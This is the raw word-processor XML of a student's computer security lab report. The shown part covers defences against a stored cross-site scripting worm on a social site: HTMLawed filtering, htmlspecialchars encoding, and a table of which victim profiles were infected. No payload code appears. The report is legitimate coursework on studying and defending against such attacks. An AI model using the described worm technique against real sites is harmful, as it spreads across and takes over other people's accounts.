            <wp:docPr id="106" name="图片 106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图片 106" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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2A6D2" w14:textId="6EF43AB4" w:rsidR="007F0C24" w:rsidRDefault="007F0C24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 Alice, all the malicious code has been modified and become</w:t>
      </w:r>
      <w:r w:rsidR="0020668E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no longer malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D0E24" w14:textId="03EFC06B" w:rsidR="0020668E" w:rsidRDefault="0020668E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1A990F8" w14:textId="52EA0FE8" w:rsidR="007F0C24" w:rsidRDefault="007F0C24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78711876" wp14:editId="59867D13">
            <wp:extent cx="5274310" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="图片 107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图片 107" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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17C6C" w14:textId="071D5D6B" w:rsidR="00026A9B" w:rsidRDefault="007F0C24" w:rsidP="00456C56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result at this step i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F0C24" w14:paraId="4E7CEFD3" w14:textId="77777777" w:rsidTr="007F0C24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A60A9CD" w14:textId="1FB58112" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="007F0C24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F0C24"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 w:rsidRPr="007F0C24">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">hat happens </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="195F14B0" w14:textId="49FC0A00" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="0020668E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tim clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA95709" w14:textId="496DC233" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="0020668E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tim injected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F0C24" w14:paraId="06ACBBD0" w14:textId="77777777" w:rsidTr="007F0C24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A095FB9" w14:textId="5F52DED4" w:rsidR="007F0C24" w:rsidRPr="00E1187E" w:rsidRDefault="007F0C24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E1187E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">riend or not with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E1187E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Samy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44AA0F87" w14:textId="55375E00" w:rsidR="007F0C24" w:rsidRPr="00E1187E" w:rsidRDefault="007F0C24" w:rsidP="00B713A6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E118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→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YE</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1187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766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B228748" w14:textId="06A43263" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="007F0C24" w:rsidP="00B713A6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→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Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1187E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</w:tr>
      <w:tr w:rsidR="007F0C24" w14:paraId="4287A1FB" w14:textId="77777777" w:rsidTr="007F0C24">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BADC832" w14:textId="06E0FE7D" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="007F0C24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F0C24">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Malicious code in profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E5F164" w14:textId="1718BB1B" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="007F0C24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→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E118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766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446A7141" w14:textId="1A703075" w:rsidR="007F0C24" w:rsidRPr="007F0C24" w:rsidRDefault="007F0C24" w:rsidP="00B713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→</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1187E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E118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</w:tbl>
    <w:p w14:paraId="0C9587E6" w14:textId="321C48C2" w:rsidR="007F0C24" w:rsidRDefault="007F0C24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seem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TMLaw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8 countermeasure can help to detect and </w:t>
      </w:r>
      <w:r w:rsidR="0020668E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> possible malicious code </w:t>
      </w:r>
      <w:r w:rsidR="00A7325A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(removed all the &lt;scripts&gt; labels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2009960E" w14:textId="7DA7E78E" w:rsidR="007F0C24" w:rsidRDefault="007F0C24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4F25F7E" w14:textId="4D58E265" w:rsidR="007F0C24" w:rsidRDefault="007F0C24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7F0C24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Turn on both countermeasures; visit any of the victim profiles and describe your observation in your report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F22750" w14:textId="0A90AB01" w:rsidR="008054C1" w:rsidRPr="007F0C24" w:rsidRDefault="008054C1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e these php files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4EFAF" w14:textId="1FEA1E00" w:rsidR="007F0C24" w:rsidRDefault="008054C1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 w:rsidRPr="008054C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A919419" wp14:editId="431EC869">
            <wp:extent cx="5274310" cy="421640"/>
            <wp:effectExtent l="0" t="0" r="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DAAEE" w14:textId="257C51F9" w:rsidR="008054C1" w:rsidRDefault="008054C1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vi</w:t>
      </w:r>
      <w:r w:rsidR="00E37F59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E37F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">check and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">uncomment the </w:t>
      </w:r>
      <w:r w:rsidR="00E37F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>li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7F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E37F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E37F59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA17AB" w14:textId="1597B2B6" w:rsidR="00E37F59" w:rsidRDefault="00E37F59" w:rsidP="007F0C24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onl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text.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>url.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dropdown.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>email.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” have such code and it’s not necessary to modify other php files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB3A9D" w14:textId="1FBEA408" w:rsidR="008054C1" w:rsidRDefault="008054C1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A78CF6" wp14:editId="04C8A18C">
            <wp:extent cx="5274310" cy="1833245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113" name="图片 11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图片 113" descr="图形用户界面, 文本&#10;&#10;描述已自动生成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4A89C" w14:textId="3C6E34A4" w:rsidR="008054C1" w:rsidRDefault="00E37F59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g into Alice, and see my profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42D7A2" w14:textId="46A8079D" w:rsidR="00E37F59" w:rsidRDefault="00E37F59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 w:rsidRPr="00E37F5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38F4AE" wp14:editId="1F0F82E4">
            <wp:extent cx="4673600" cy="431800"/>
            <wp:effectExtent l="0" t="0" r="0" b="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BC919" w14:textId="59379F10" w:rsidR="00E37F59" w:rsidRDefault="00E37F59" w:rsidP="007F0C24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hing and just click “save”, and then click into my profile again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684438E4" w14:textId="01867A14" w:rsidR="00E37F59" w:rsidRDefault="00E37F59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 w:rsidRPr="00E37F59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6B919F6" wp14:editId="0B8B7EA7">
            <wp:extent cx="3706045" cy="530866"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="114" name="图片 114" descr="图片包含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图片 114" descr="图片包含 背景图案&#10;&#10;描述已自动生成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758801" cy="5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60797" w14:textId="508373F3" w:rsidR="00E37F59" w:rsidRDefault="00314709" w:rsidP="007F0C2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e the description with malicious code was removed automatically</w:t>
      </w:r>
      <w:r w:rsidR="002943D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002943D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTMLawed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002943D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.8 works. But we can still do a test to see what function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002943D0" w:rsidRPr="002943D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002943D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E0508" w14:textId="4C08D0CD" w:rsidR="007F0C24" w:rsidRPr="002943D0" w:rsidRDefault="002943D0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these characters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B17C4" w14:textId="08389239" w:rsidR="00803CAA" w:rsidRDefault="00803CAA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C96D6B" wp14:editId="34D09C18">
            <wp:extent cx="5274310" cy="508635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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图片 119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E4602" w14:textId="472087E8" w:rsidR="002943D0" w:rsidRDefault="002943D0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click “save” and interesting things happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11408D84" w14:textId="207EE790" w:rsidR="002943D0" w:rsidRDefault="002943D0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 w:rsidRPr="002943D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35DB270" wp14:editId="4C9349C1">
            <wp:extent cx="3898900" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="图片 121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图片 121" descr="图片包含 图形用户界面&#10;&#10;描述已自动生成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989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6370F" w14:textId="1542AF0B" w:rsidR="002943D0" w:rsidRDefault="002943D0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2943D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A41E3A2" wp14:editId="0CC67EE5">
            <wp:extent cx="4292600" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123" name="图片 123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图片 123" descr="文本&#10;&#10;中度可信度描述已自动生成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926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6FFEB" w14:textId="606B799E" w:rsidR="002943D0" w:rsidRDefault="002943D0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ut if we click into the profile, it still shows normally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F6F11" w14:textId="72B242EB" w:rsidR="002943D0" w:rsidRPr="002943D0" w:rsidRDefault="002943D0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2943D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BBE3073" wp14:editId="0A558805">
            <wp:extent cx="2705100" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="图片 122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图片 122" descr="图形用户界面, 文本, 应用程序, 聊天或短信&#10;&#10;描述已自动生成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3946E" w14:textId="5140695F" w:rsidR="00E1187E" w:rsidRPr="00DF49E7" w:rsidRDefault="00E1187E" w:rsidP="00DF49E7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc89727059"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>hanks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="08F647FE" w14:textId="29E1A5D4" w:rsidR="00456C56" w:rsidRDefault="00016499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 w:hint="eastAsia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mentioned in my report is available in my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00352EF3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</w:t>
      </w:r>
      <w:r w:rsidR="00352EF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sitor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73" w:history="1">
        <w:r w:rsidRPr="0079784B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/EnzeXu/Computer_Security_Enze_Xu_Final_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D23E56B" w14:textId="7254D251" w:rsidR="00016499" w:rsidRDefault="00016499" w:rsidP="00456C5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B155F2B" w14:textId="284E4544" w:rsidR="00016499" w:rsidRDefault="00016499" w:rsidP="00456C5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so much for bringing us a good time this semester, dear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Alqahta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C404FD" w14:textId="569802F4" w:rsidR="00016499" w:rsidRPr="00016499" w:rsidRDefault="00016499" w:rsidP="00456C5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ze Xu</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00016499" w:rsidRPr="00016499">
      <w:headerReference w:type="even" r:id="rId74"/>
      <w:headerReference w:type="default" r:id="rId75"/>
      <w:footerReference w:type="even" r:id="rId76"/>
      <w:footerReference w:type="default" r:id="rId77"/>
      <w:headerReference w:type="first" r:id="rId78"/>
      <w:footerReference w:type="first" r:id="rId7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F7E78" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203FA" w:rsidP="006B1493">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57F4BA8C" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203FA" w:rsidP="006B1493">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="027AE380" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203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34164" w14:textId="77777777" w:rsidR="00DD6CD6" w:rsidRDefault="00DD6CD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86880" w14:textId="77777777" w:rsidR="00DD6CD6" w:rsidRDefault="00DD6CD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CC218" w14:textId="77777777" w:rsidR="00DD6CD6" w:rsidRDefault="00DD6CD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2193C" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203FA" w:rsidP="006B1493">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="443749B0" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203FA" w:rsidP="006B1493">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="2075DDC1" w14:textId="77777777" w:rsidR="00E203FA" w:rsidRDefault="00E203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AFBF4" w14:textId="77777777" w:rsidR="00DD6CD6" w:rsidRDefault="00DD6CD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35D965B9" w:rsidR="00E9289F" w:rsidRPr="00160640" w:rsidRDefault="00DD6CD6" w:rsidP="009118FD">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
      <w:t xml:space="preserve">Final </w:t>
    </w:r>
    <w:r w:rsidR="00160640" w:rsidRPr="00160640">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="楷体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
      <w:t>Project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 w:rsidR="00160640"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A41C7" w14:textId="77777777" w:rsidR="00DD6CD6" w:rsidRDefault="00DD6CD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E6463"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED5A5364"/>
    <w:lvl w:ilvl="0" w:tplc="B11AA50A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="36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F5865B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="256ACF84"/>
    <w:lvl w:ilvl="0" w:tplc="8694707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tKgFAN+NxwwtAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006B1493"/>
    <w:rsid w:val="00000344"/>
    <w:rsid w:val="00013A1D"/>
    <w:rsid w:val="00014E7F"/>
    <w:rsid w:val="00015ED9"/>
    <w:rsid w:val="00016499"/>
    <w:rsid w:val="00017799"/>
    <w:rsid w:val="00020560"/>
    <w:rsid w:val="000248E5"/>
    <w:rsid w:val="00026A9B"/>
    <w:rsid w:val="00034357"/>
    <w:rsid w:val="000348A9"/>
    <w:rsid w:val="00037E52"/>
    <w:rsid w:val="0004423E"/>
    <w:rsid w:val="00047022"/>
    <w:rsid w:val="000517E3"/>
    <w:rsid w:val="00054071"/>
    <w:rsid w:val="0006173D"/>
    <w:rsid w:val="000639D3"/>
    <w:rsid w:val="00064493"/>
    <w:rsid w:val="0006487E"/>
    <w:rsid w:val="000656CE"/>
    <w:rsid w:val="00084A8C"/>
    <w:rsid w:val="00084AC4"/>
    <w:rsid w:val="00086AB2"/>
    <w:rsid w:val="000A2D13"/>
    <w:rsid w:val="000A735D"/>
    <w:rsid w:val="000B3570"/>
    <w:rsid w:val="000C1189"/>
    <w:rsid w:val="000C1352"/>
    <w:rsid w:val="000C655F"/>
    <w:rsid w:val="000D0FA0"/>
    <w:rsid w:val="000D6D3D"/>
    <w:rsid w:val="000E34E8"/>
    <w:rsid w:val="000E4FE2"/>
    <w:rsid w:val="000E5029"/>
    <w:rsid w:val="000E701C"/>
    <w:rsid w:val="000F5382"/>
    <w:rsid w:val="00100ACF"/>
    <w:rsid w:val="001055B9"/>
    <w:rsid w:val="00107447"/>
    <w:rsid w:val="00112E82"/>
    <w:rsid w:val="00115171"/>
    <w:rsid w:val="00117635"/>
    <w:rsid w:val="001206A0"/>
    <w:rsid w:val="0012130C"/>
    <w:rsid w:val="00123F24"/>
    <w:rsid w:val="0014626C"/>
    <w:rsid w:val="00153747"/>
    <w:rsid w:val="00153DEB"/>
    <w:rsid w:val="00160640"/>
    <w:rsid w:val="00161CF2"/>
    <w:rsid w:val="001621B8"/>
    <w:rsid w:val="0016619B"/>
    <w:rsid w:val="00171F0D"/>
    <w:rsid w:val="00172210"/>
    <w:rsid w:val="00173A45"/>
    <w:rsid w:val="001746EA"/>
    <w:rsid w:val="00176347"/>
    <w:rsid w:val="00183BBB"/>
    <w:rsid w:val="001875DA"/>
    <w:rsid w:val="0019157B"/>
    <w:rsid w:val="0019480B"/>
    <w:rsid w:val="001A6B87"/>
    <w:rsid w:val="001A6CE2"/>
    <w:rsid w:val="001B3ABC"/>
    <w:rsid w:val="001C6452"/>
    <w:rsid w:val="001D2BEB"/>
    <w:rsid w:val="001E12FB"/>
    <w:rsid w:val="001E3580"/>
    <w:rsid w:val="001E3CB8"/>
    <w:rsid w:val="001E3E8E"/>
    <w:rsid w:val="001E6537"/>
    <w:rsid w:val="001F4F12"/>
    <w:rsid w:val="00205F18"/>
    <w:rsid w:val="0020668E"/>
    <w:rsid w:val="00214AEA"/>
    <w:rsid w:val="002227C7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67062"/>
    <w:rsid w:val="002720AC"/>
    <w:rsid w:val="00272524"/>
    <w:rsid w:val="00280A27"/>
    <w:rsid w:val="0028136C"/>
    <w:rsid w:val="00291936"/>
    <w:rsid w:val="002943D0"/>
    <w:rsid w:val="002A1223"/>
    <w:rsid w:val="002A7415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14709"/>
    <w:rsid w:val="0032232C"/>
    <w:rsid w:val="0032360B"/>
    <w:rsid w:val="00324B46"/>
    <w:rsid w:val="00326C94"/>
    <w:rsid w:val="00326F46"/>
    <w:rsid w:val="00327095"/>
    <w:rsid w:val="00327709"/>
    <w:rsid w:val="00330D00"/>
    <w:rsid w:val="003316C6"/>
    <w:rsid w:val="00331FA8"/>
    <w:rsid w:val="003350DA"/>
    <w:rsid w:val="0033531C"/>
    <w:rsid w:val="003379BA"/>
    <w:rsid w:val="0034011C"/>
    <w:rsid w:val="00341106"/>
    <w:rsid w:val="00341C48"/>
    <w:rsid w:val="003422D4"/>
    <w:rsid w:val="003446AF"/>
    <w:rsid w:val="00352EF3"/>
    <w:rsid w:val="0035321C"/>
    <w:rsid w:val="0035410D"/>
    <w:rsid w:val="00354C4B"/>
    <w:rsid w:val="0035593C"/>
    <w:rsid w:val="0038015A"/>
    <w:rsid w:val="003841D2"/>
    <w:rsid w:val="003955C1"/>
    <w:rsid w:val="003A099D"/>
    <w:rsid w:val="003A2E69"/>
    <w:rsid w:val="003A4062"/>
    <w:rsid w:val="003A7103"/>
    <w:rsid w:val="003B6BCD"/>
    <w:rsid w:val="003C2C5D"/>
    <w:rsid w:val="003C45D6"/>
    <w:rsid w:val="003C7F18"/>
    <w:rsid w:val="003D3702"/>
    <w:rsid w:val="003D7A96"/>
    <w:rsid w:val="003E218D"/>
    <w:rsid w:val="003E5616"/>
    <w:rsid w:val="003F1001"/>
    <w:rsid w:val="003F2333"/>
    <w:rsid w:val="003F2A83"/>
    <w:rsid w:val="003F331C"/>
    <w:rsid w:val="003F3A12"/>
    <w:rsid w:val="004001D5"/>
    <w:rsid w:val="00400761"/>
    <w:rsid w:val="0040591E"/>
    <w:rsid w:val="0041024A"/>
    <w:rsid w:val="00411F25"/>
    <w:rsid w:val="004120C1"/>
    <w:rsid w:val="00413151"/>
    <w:rsid w:val="00416441"/>
    <w:rsid w:val="004165A8"/>
    <w:rsid w:val="0041673D"/>
    <w:rsid w:val="00417952"/>
    <w:rsid w:val="004314F1"/>
    <w:rsid w:val="00450732"/>
    <w:rsid w:val="00456C56"/>
    <w:rsid w:val="004634CA"/>
    <w:rsid w:val="00465748"/>
    <w:rsid w:val="00470070"/>
    <w:rsid w:val="00470CA8"/>
    <w:rsid w:val="0048035B"/>
    <w:rsid w:val="00480860"/>
    <w:rsid w:val="00482F39"/>
    <w:rsid w:val="00487531"/>
    <w:rsid w:val="004907DB"/>
    <w:rsid w:val="00490E13"/>
    <w:rsid w:val="00495414"/>
    <w:rsid w:val="00497D09"/>
    <w:rsid w:val="004A26A9"/>
    <w:rsid w:val="004B26F8"/>
    <w:rsid w:val="004B682B"/>
    <w:rsid w:val="004C0C8C"/>
    <w:rsid w:val="004C3214"/>
    <w:rsid w:val="004C4D00"/>
    <w:rsid w:val="004E00B7"/>
    <w:rsid w:val="004E29FA"/>
    <w:rsid w:val="004F25EB"/>
    <w:rsid w:val="005001B6"/>
    <w:rsid w:val="00500ABD"/>
    <w:rsid w:val="00505184"/>
    <w:rsid w:val="005114EB"/>
    <w:rsid w:val="00513230"/>
    <w:rsid w:val="005272D4"/>
    <w:rsid w:val="00530C4C"/>
    <w:rsid w:val="00530FAC"/>
    <w:rsid w:val="00534010"/>
    <w:rsid w:val="00537377"/>
    <w:rsid w:val="00540F05"/>
    <w:rsid w:val="00542B71"/>
    <w:rsid w:val="00542BBD"/>
    <w:rsid w:val="0054351F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E1322"/>
    <w:rsid w:val="005E732C"/>
    <w:rsid w:val="005F22CC"/>
    <w:rsid w:val="00601BBB"/>
    <w:rsid w:val="00616837"/>
    <w:rsid w:val="00627A0F"/>
    <w:rsid w:val="00633A66"/>
    <w:rsid w:val="00634361"/>
    <w:rsid w:val="006373D7"/>
    <w:rsid w:val="006406D9"/>
    <w:rsid w:val="0064429E"/>
    <w:rsid w:val="00644980"/>
    <w:rsid w:val="00647665"/>
    <w:rsid w:val="00651E85"/>
    <w:rsid w:val="00653D9C"/>
    <w:rsid w:val="00664DDB"/>
    <w:rsid w:val="00664F92"/>
    <w:rsid w:val="006729E7"/>
    <w:rsid w:val="00674845"/>
    <w:rsid w:val="00677461"/>
    <w:rsid w:val="0067783F"/>
    <w:rsid w:val="0068268F"/>
    <w:rsid w:val="00682E0B"/>
    <w:rsid w:val="00684A67"/>
    <w:rsid w:val="00684C8A"/>
    <w:rsid w:val="00685450"/>
    <w:rsid w:val="006976AD"/>
    <w:rsid w:val="006B06F9"/>
    <w:rsid w:val="006B1493"/>
    <w:rsid w:val="006B3D59"/>
    <w:rsid w:val="006B5DC6"/>
    <w:rsid w:val="006C077C"/>
    <w:rsid w:val="006C325C"/>
    <w:rsid w:val="006C39B7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4722E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4F82"/>
